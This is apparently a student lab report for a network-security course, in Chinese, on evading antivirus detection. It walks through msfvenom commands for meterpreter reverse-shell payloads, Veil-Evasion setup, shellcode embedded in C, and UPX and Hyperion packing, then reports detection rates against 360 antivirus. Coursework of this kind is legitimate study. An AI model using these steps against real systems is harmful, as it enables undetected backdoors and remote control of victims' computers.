20155233 《网络对抗技术》EXP3 免杀原理与实践

正确使用msf编码器，msfvenom生成如jar之类的其他文件，veil-evasion，自己利用shellcode编程等免杀工具或技巧

• 使用msf编码器生成jar包

1. 输入命令msfvenom -p java/meterpreter/reverse_tcp lhost=LIinuxIP lport=端口号 x> 文件名.jar
   
2. 查杀检测：可以看出较exe文件，jar文件的查出率较低些。
   

• 首先对exp2的木马程序进行查杀率检测：可以看出有一半引擎发现病毒，可以说我们做出的后门相当low了。
  
• Veil-Evasion安装：

1. 输入sudo apt-get install veil安装veil，默认安装进行，一路y或者next；
2. 输入sudo apt-get install veil-evasion安装veil-evasion，可能会出现好多问题，希望你能一路next。

• Veil-Evasion免杀使用：

1. 输入veil进入软件，输入use evasion进入veil-evasion；
   
2. 输入use c/meterpreter/rev_tcp.py生成可执行文件；
3. 设置反弹IP和端口号：
   set LHOST linuxIP：设置LHOST；
   set LPORT 端口号：设置LPORT；
   generate：生成。
   
4. 输入文件名保存。
   
5. 查杀率检测：可以看出大多数引擎没有检测到病毒，所以说使用veil还是有很多帮助的
   

• C语言调用Shellcode

1. 输入命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.241.130 LPORT=443 -f c调用shellcode
   
2. 使用该数组编写一个程序（ha.c）
   3.Linux平台交叉编译Windows应用(ha.exe)
   
3. 返回连接测试：360检测到木马，信任后可以连接成功
   
   
4. 结合使用不同编码器，连接成功。
   msfvenom -p windows/meterpreter/reverse_https -e x86/bloxor LHOST=LinuxIP HPORT=端口号 -f c
   
   

• VC6.0（代替VisualStudio）
  1.对ha.c进行修改(文件名：backdoor.cpp)，参考教程
  2.连接测试：连接成功，360未查出木马
  

通过组合应用各种技术实现恶意代码免杀

加壳

• 输入命令upx 加壳前文件名.exe -o 加壳后文件名.exe进行加壳
  
• 前后对比：并没有多大区别，尝试其他方式
  
  

加密壳Hyperion

• 找到veil-evasion下hyperion文件夹，进行操作
  
• 输入命令wine hyperion.exe -v 加密前,exe 加密后.exe进行加密壳操作
  
• 前后对比：较加密前增多，可见杀毒软件时刻在盯着大厂商的加密壳
  

用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本

• 经过多番尝试，我们选择upx加壳后的backdoor1.exe进行实测
• 测试结果：其他电脑杀软未发现后门，杀软版本360.11
  
  但是回连失败，原因是虚拟机一直ping不通对方电脑，只能回连自己电脑
  

基础问题回答

• 杀软是如何检测出恶意代码的？
  答：应该是我们生成的shellcode有一段特征码，然后被杀软识别出来了。
• 免杀是做什么？
  答：应该是将这段特征码进行修饰，使躲避杀软的查证。

• 免杀的基本方法有哪些？
  答：多次编译、使用不同的编译器、加壳、加密壳、修改特征码等

  实践总结与体会

• 生成一个可执行后门程序很容易，但要做到免杀就很难了，你要考虑很多，各种方法都要去结合尝试，通过这几个实验尝试，有的方法反而增多了报毒率，适得其反，而且让后门自启动更是一个关键的问题。

• 离实战还缺些什么技术或步骤？
  答：当然是如何让后门自启动，或者远程控制启动，更重要的是如何与杀软共从，长期存放。